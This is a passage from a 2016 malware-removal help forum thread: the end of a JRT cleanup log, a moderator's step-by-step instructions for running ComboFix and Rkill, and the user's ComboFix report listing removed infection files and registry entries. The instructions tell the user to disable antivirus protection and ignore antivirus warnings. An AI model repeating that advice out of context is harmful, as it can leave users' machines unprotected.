    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KFB13BQ1 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LIXMVQOA (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M30NBFXJ (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\P93G45E1 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLONG5EF (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBDPD582 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X93KGSF9 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y7CXR8F0 (Temporary Internet Files Folder)



    Registry: 3

    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\\win_en_77 (Registry Value)
    Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7B6678FD-F9E3-46FD-aCF0-4C011573F737} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7B6678FD-F9E3-46FD-aCF0-4C011573F737} (Registry Key)




    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 18/09/2016 at 21:09:05.30
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  13. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Good news :)

    Please download ComboFix from Here, Here or Here to your Desktop.

    **Note: In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**
    • Never rename Combofix unless instructed.
    • Close any open browsers.
    • Very Important! Temporarily disable your anti-virus and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
    • Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
    • WARNING: Combofix will disconnect your machine from the Internet as soon as it starts.
    • Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
    • If there is no internet connection after running Combofix, then restart your computer to restore your connection.
      If the connection is not there, use the restore point you created prior to running Combofix.
    • Double click on combofix.exe & follow the prompts.

    • NOTE 1. If Combofix asks you to install Recovery Console, please allow it.
      NOTE 2. If Combofix asks you to update the program, always do so.
    • When finished, it will produce a report for you.
    • Please post the "C:\ComboFix.txt"
    **Note 1: Do not mouse-click Combofix's window while it's running. That may cause it to stall.
    **Note 2 for AVG and CA Internet Security (Total Defense Internet Security) users: ComboFix will not run until AVG/CA Internet Security is uninstalled as a protective measure against the anti-virus. This is because AVG/CA Internet Security "falsely" detects ComboFix (or its embedded files) as a threat and may remove them resulting in the tool not working correctly which in turn can cause "unpredictable results". Since AVG/CA Internet Security cannot be effectively disabled before running ComboFix, the author recommends you to uninstall AVG/CA Internet Security first.
    Use AppRemover to uninstall it: http://www.appremover.com/
    We can reinstall it when we're done with CF.
    **Note 3: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion", restart the computer to fix the issue.
    **Note 4: Some infections may take some significant time to be cured. As long as your computer clock is running Combofix is still working. Be patient.


    Make sure you re-enable your security programs when you're done with Combofix.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    NOTE.
    If, for some reason, Combofix refuses to run, try the following...

    Delete the Combofix file and download a fresh one, but rename combofix.exe to your_name.exe BEFORE saving it to your desktop.
    Do NOT run it yet.
    Download Rkill (courtesy of BleepingComputer.com) to your desktop.
    There are 2 different versions. If one of them won't run then download and try to run the other one.
    You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool; ignore them or shut down your antivirus.

    rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
    iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

    Restart the computer in safe mode.

    • Double-click on the Rkill desktop icon to run the tool.
    • If using Windows Vista, 7 or 8, right-click on it and choose Run As Administrator.
    • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
    • If not, delete the file, then download and use the one provided in Link 2.
    • Do not reboot until instructed.
    • If the tool does not run from any of the links provided, please let me know.

    When the scan is done Notepad will open with rKill.txt log.
    NOTE. rKill.txt log will also be present on your desktop.

    Once you've gotten one of them to run, immediately run your_name.exe by double clicking on it.

    If you had to run rKill, post BOTH logs, rKill.txt and Combofix.txt.
     
  14. photiost

    photiost Established Techie7 Member

    ComboFix 16-09-14.01 - Administrator 18/09/2016 22:21:10.2.4 - x64
    Microsoft Windows 7 Professional 6.1.7601.1.1252.2.1033.18.3994.2585 [GMT -4:00]
    Running from: c:\users\Administrator\Desktop\ComboFix.exe
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    * Created a new restore point
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\programdata\ntuser.pol
    c:\users\Administrator\AppData\Local\misgua.dll
    c:\users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\YoutubeMusicDownloader.url
    c:\windows\TEMP\ds2918.bin
    .
    Infected copy of c:\windows\SysWow64\dnsapi.dll was found and disinfected
    Restored copy from - c:\windows\winsxs\wow64_microsoft-windows-dns-client_31bf3856ad364e35_6.1.7601.17570_none_4a184beecd8df1f1\dnsapi.dll
    .
    .
    ((((((((((((((((((((((((( Files Created from 2016-08-19 to 2016-09-19 )))))))))))))))))))))))))))))))
    .
    .
    2016-09-19 07:08 . 2016-09-19 07:08 -------- d-----w- c:\users\Administrator\AppData\Local\CrashRpt
    2016-09-19 01:07 . 2016-09-19 01:07 -------- d-----w- c:\users\Administrator\AppData\Roaming\KuaiZip
    2016-09-19 00:56 . 2016-09-19 01:02 -------- d-----w- C:\AdwCleaner
    2016-09-19 00:15 . 2016-09-19 00:58 -------- d-----w- c:\users\Administrator\AppData\Local\CrashDumps
    2016-09-19 00:09 . 2016-09-19 07:08 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
    2016-09-19 00:09 . 2016-09-19 00:09 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
    2016-09-19 00:09 . 2016-09-19 00:09 -------- d-----w- c:\programdata\Malwarebytes
    2016-09-19 00:09 . 2016-03-10 18:09 64896 ----a-w- c:\windows\system32\drivers\mwac.sys
    2016-09-19 00:09 . 2016-03-10 18:08 140672 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
    2016-09-19 00:09 . 2016-03-10 18:08 27008 ----a-w- c:\windows\system32\drivers\mbam.sys
    2016-09-19 00:09 . 2016-09-19 01:00 -------- d-----w- c:\program files (x86)\KuaiZip
    2016-09-18 23:22 . 2016-09-18 23:22 28272 ----a-w- c:\windows\system32\drivers\TrueSight.sys
    2016-09-18 23:21 . 2016-09-18 23:21 -------- d-----w- c:\program files\RogueKiller
    2016-09-18 23:21 . 2016-09-18 23:21 -------- d-----w- c:\programdata\RogueKiller
    2016-09-18 15:57 . 2016-09-18 15:58 -------- d-----w- C:\FRST
    2016-09-18 14:48 . 2016-09-18 14:48 -------- d-----w- c:\program files (x86)\Mozilla Maintenance Service
    2016-09-18 13:09 . 2016-09-18 13:09 -------- d-----w- c:\windows\system32\appmgmt
    2016-09-18 12:49 . 2016-09-18 12:49 -------- d-----w- c:\windows\system32\guu
    2016-09-18 12:05 . 2016-09-18 13:57 -------- d-----w- c:\program files (x86)\LuDaShib
    2016-09-18 12:04 . 2016-09-18 12:50 -------- d-----w- c:\program files\nplusb
    2016-09-18 12:03 . 2016-09-18 12:03 -------- d-----w- c:\users\Administrator\AppData\Local\A
    2016-09-18 12:01 . 2016-09-19 00:37 -------- d-----w- c:\users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 12:01 . 2016-09-18 12:01 -------- d-----w- c:\users\Administrator\AppData\Local\Tempfolder
    2016-09-18 12:01 . 2016-09-18 12:48 -------- d-----w- c:\program files\IcattiUnb
    2016-09-18 12:01 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\hostb
    2016-09-18 11:59 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\DPowerb
    2016-09-18 11:59 . 2016-09-19 00:37 -------- d-----w- c:\program files\Casterb
    2016-09-18 11:58 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\EasyHotspotb
    2016-09-18 11:55 . 2016-09-18 11:56 -------- d-----w- c:\users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 10:33 . 2016-09-18 10:33 -------- d-----w- c:\users\Default\AppData\Local\Microsoft Help
    2016-09-17 01:23 . 2016-09-17 01:25 -------- d-----w- c:\windows\system32\MRT
    2016-09-17 01:12 . 2016-09-18 12:50 -------- d-----w- C:\SUPERDelete
    2016-09-16 14:46 . 2016-09-16 15:05 -------- d-----w- C:\aa Canon 450D Master acum
    2016-09-16 14:41 . 2016-09-16 14:41 -------- d-----w- c:\program files (x86)\Microsoft Visual Studio 8
    2016-09-16 14:41 . 2016-09-16 14:41 -------- d-----w- c:\windows\PCHEALTH
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----w- c:\program files\Microsoft Office
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----w- c:\users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 14:39 . 2016-09-18 10:36 -------- d-----w- c:\programdata\Microsoft Help
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----r- C:\MSOCache
    2016-09-16 14:11 . 2016-08-02 22:36 11847048 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{C4727AA1-FE32-4514-A99B-0C2DE3191D42}\mpengine.dll
    2016-09-14 05:09 . 2016-09-02 15:35 5548264 ----a-w- c:\windows\system32\ntoskrnl.exe
    2016-09-14 01:45 . 2016-09-14 01:48 -------- d-----w- C:\aa Samsung Master accum
    2016-09-13 05:39 . 2016-07-08 15:32 2048 ----a-w- c:\windows\system32\tzres.dll
    2016-09-13 05:39 . 2016-07-08 15:16 2048 ----a-w- c:\windows\SysWow64\tzres.dll
    2016-09-12 23:55 . 2016-06-11 03:34 1597712 ----a-w- c:\program files\Common Files\Microsoft Shared\ClickToRun\ClientTelemetry.dll
    2016-09-12 23:48 . 2016-09-17 11:41 -------- d-----w- C:\aa Canon 600D - T3i Master accum
    2016-09-05 10:40 . 2016-09-05 10:40 28920 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll
    2016-09-05 10:15 . 2016-09-05 10:15 376608 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
    2016-09-05 10:09 . 2016-09-05 10:09 209104 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2016-09-05 18:43 . 2016-01-29 22:54 2909888 ----a-w- c:\programdata\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
    2016-09-02 15:16 . 2016-09-14 05:09 44032 ----a-w- c:\windows\apppatch\acwow64.dll
    2016-07-26 18:24 . 2010-11-21 03:27 504488 ------w- c:\windows\system32\MpSigStub.exe
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive1]
    @="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
    [HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive2]
    @="{5AB7172C-9C11-405C-8DD5-AF20F3606282}"
    [HKEY_CLASSES_ROOT\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive3]
    @="{A78ED123-AB77-406B-9962-2A5D9D2F7F30}"
    [HKEY_CLASSES_ROOT\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive4]
    @="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
    [HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive5]
    @="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
    [HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro1 (ErrorConflict)]
    @="{8BA85C75-763B-4103-94EB-9470F12FE0F7}"
    [HKEY_CLASSES_ROOT\CLSID\{8BA85C75-763B-4103-94EB-9470F12FE0F7}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro2 (SyncInProgress)]
    @="{CD55129A-B1A1-438E-A425-CEBC7DC684EE}"
    [HKEY_CLASSES_ROOT\CLSID\{CD55129A-B1A1-438E-A425-CEBC7DC684EE}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro3 (InSync)]
    @="{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}"
    [HKEY_CLASSES_ROOT\CLSID\{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SUPERAntiSpyware"="c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe" [2016-09-12 7943072]
    "Chromium"="c:\users\administrator\appdata\local\chromium\application\chrome.exe" [2016-03-18 1068544]
    "Interstatnogui"="c:\users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe" [2016-09-18 4110848]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "ConsentPromptBehaviorAdmin"= 5 (0x5)
    "ConsentPromptBehaviorUser"= 3 (0x3)
    "EnableUIADesktopToggle"= 0 (0x0)
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
    "LoadAppInit_DLLs"=1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\!SASCORE]
    @=""
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
    @="Driver"
    .
    R3 d554gps;Dell Wireless HSPA Mini-Card GPS Port;c:\windows\system32\drivers\d554gps64.sys;c:\windows\SYSNATIVE\drivers\d554gps64.sys [x]
    R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
    R3 ecnssndis; Mobile Broadband Driver;c:\windows\System32\Drivers\wwuss64.sys;c:\windows\SYSNATIVE\Drivers\wwuss64.sys [x]
    R3 ecnssndisfltr; Mobile Broadband Driver Filter;c:\windows\System32\Drivers\wwussf64.sys;c:\windows\SYSNATIVE\Drivers\wwussf64.sys [x]
    R3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\drivers\HECIx64.sys;c:\windows\SYSNATIVE\drivers\HECIx64.sys [x]
    R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
    R3 Impcd;Impcd;c:\windows\system32\drivers\Impcd.sys;c:\windows\SYSNATIVE\drivers\Impcd.sys [x]
    R3 Mbm3CBus;Dell Wireless 5530 HSPA Mini-Card Device (WDM);c:\windows\system32\drivers\Mbm3CBus.sys;c:\windows\SYSNATIVE\drivers\Mbm3CBus.sys [x]
    R3 Mbm3DevMt;Dell Wireless HSPA Mini-Card Device Management Driver (WDM);c:\windows\system32\drivers\Mbm3DevMt.sys;c:\windows\SYSNATIVE\drivers\Mbm3DevMt.sys [x]
    R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
    R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
    R3 NvStUSB;NVIDIA Stereoscopic 3D USB driver;c:\windows\system32\drivers\nvstusb.sys;c:\windows\SYSNATIVE\drivers\nvstusb.sys [x]
    R3 nwdelgobi3kfilter;Dell Wireless Gobi 3000 USB Composite Device Filter Driver;c:\windows\system32\drivers\nwdelgobi3kfilter.sys;c:\windows\SYSNATIVE\drivers\nwdelgobi3kfilter.sys [x]
    R3 NWDellPort;Dell Wireless Mobile Broadband Status Port Driver;c:\windows\system32\drivers\nwdelser.sys;c:\windows\SYSNATIVE\drivers\nwdelser.sys [x]
    R3 NWDellPort2;Dell Wireless Mobile Broadband Status2 Port Driver;c:\windows\system32\drivers\nwdelser2.sys;c:\windows\SYSNATIVE\drivers\nwdelser2.sys [x]
    R3 nwdelserial;Dell Wireless Mobile Broadband Serial Driver;c:\windows\system32\drivers\nwdelserial.sys;c:\windows\SYSNATIVE\drivers\nwdelserial.sys [x]
    R3 O2MDFRDR;O2MDFRDR;c:\windows\system32\drivers\O2MDFw7x64.sys;c:\windows\SYSNATIVE\drivers\O2MDFw7x64.sys [x]
    R3 qcfilterdl2k;Dell Wireless 5620 (EV-DO-HSPA) Mobile Broadband Mini-Card Composite Device Filter;c:\windows\system32\drivers\qcfilterdl2k.sys;c:\windows\SYSNATIVE\drivers\qcfilterdl2k.sys [x]
    R3 qcombusdl;Gobi 2000 USB Composite Device Driver(413C-8186);c:\windows\system32\drivers\qcombusdl.sys;c:\windows\SYSNATIVE\drivers\qcombusdl.sys [x]
    R3 qcusbserdl2k;Gobi 2000 USB Device for Legacy Serial Communication(413C-8186);c:\windows\system32\drivers\qcusbserdl2k.sys;c:\windows\SYSNATIVE\drivers\qcusbserdl2k.sys [x]
    R3 rimspci;rimspci;c:\windows\system32\drivers\rimspe64.sys;c:\windows\SYSNATIVE\drivers\rimspe64.sys [x]
    R3 risdpcie;risdpcie;c:\windows\system32\drivers\risdpe64.sys;c:\windows\SYSNATIVE\drivers\risdpe64.sys [x]
    R3 rixdpcie;rixdpcie;c:\windows\system32\drivers\rixdpe64.sys;c:\windows\SYSNATIVE\drivers\rixdpe64.sys [x]
    R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\System32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
    R3 stmtpm;stmtpm;c:\windows\system32\drivers\stm_tpm.sys;c:\windows\SYSNATIVE\drivers\stm_tpm.sys [x]
    R3 tcm;tcm;c:\windows\system32\drivers\tcm.sys;c:\windows\SYSNATIVE\drivers\tcm.sys [x]
    R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
    R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
    R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
    S0 stdcfltn;Disk Class Filter Driver for Accelerometer;c:\windows\system32\DRIVERS\stdcfltn.sys;c:\windows\SYSNATIVE\DRIVERS\stdcfltn.sys [x]
    S1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\SASDIFSV64.SYS;c:\program files\SUPERAntiSpyware\SASDIFSV64.SYS [x]
    S1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL64.SYS;c:\program files\SUPERAntiSpyware\SASKUTIL64.SYS [x]
    S2 !SASCORE;SAS Core Service;c:\program files\SUPERAntiSpyware\SASCORE64.EXE;c:\program files\SUPERAntiSpyware\SASCORE64.EXE [x]
    S2 AESTFilters;Andrea ST Filters Service;c:\program files\IDT\WDM\AESTSr64.exe;c:\program files\IDT\WDM\AESTSr64.exe [x]
    S2 ClickToRunSvc;Microsoft Office Click-to-Run Service;c:\program files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe;c:\program files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [x]
    S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
    S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
    S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
    S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
    S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
    S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
    S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
    S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
    S3 O2MDRRDR;O2MDRRDR;c:\windows\system32\DRIVERS\O2MDRw7x64.sys;c:\windows\SYSNATIVE\DRIVERS\O2MDRw7x64.sys [x]
    S3 O2SDJRDR;O2SDJRDR;c:\windows\system32\DRIVERS\o2sdjw7x64.sys;c:\windows\SYSNATIVE\DRIVERS\o2sdjw7x64.sys [x]
    S3 ST_ACCEL;STMicroelectronics Accelerometer Service;c:\windows\system32\DRIVERS\ST_ACCEL.sys;c:\windows\SYSNATIVE\DRIVERS\ST_ACCEL.sys [x]
    .
    .
    --- Other Services/Drivers In Memory ---
    .
    *NewlyCreated* - MBAMSWISSARMY
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ SSDPSRV upnphost SCardSvr QWAVE wcncsvc
    kuaizip2updatesvc REG_MULTI_SZ Kuaizip Update Checker
    .
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
    HpSvc
    .
    .
    --------- X64 Entries -----------
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive1]
    @="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
    [HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive2]
    @="{5AB7172C-9C11-405C-8DD5-AF20F3606282}"
    [HKEY_CLASSES_ROOT\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive3]
    @="{A78ED123-AB77-406B-9962-2A5D9D2F7F30}"
    [HKEY_CLASSES_ROOT\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive4]
    @="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
    [HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive5]
    @="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
    [HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
    2016-01-29 23:03 358064 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro1 (ErrorConflict)]
    @="{8BA85C75-763B-4103-94EB-9470F12FE0F7}"
    [HKEY_CLASSES_ROOT\CLSID\{8BA85C75-763B-4103-94EB-9470F12FE0F7}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro2 (SyncInProgress)]
    @="{CD55129A-B1A1-438E-A425-CEBC7DC684EE}"
    [HKEY_CLASSES_ROOT\CLSID\{CD55129A-B1A1-438E-A425-CEBC7DC684EE}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro3 (InSync)]
    @="{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}"
    [HKEY_CLASSES_ROOT\CLSID\{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}]
    2016-09-05 14:50 2278192 ----a-w- c:\program files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL
    .
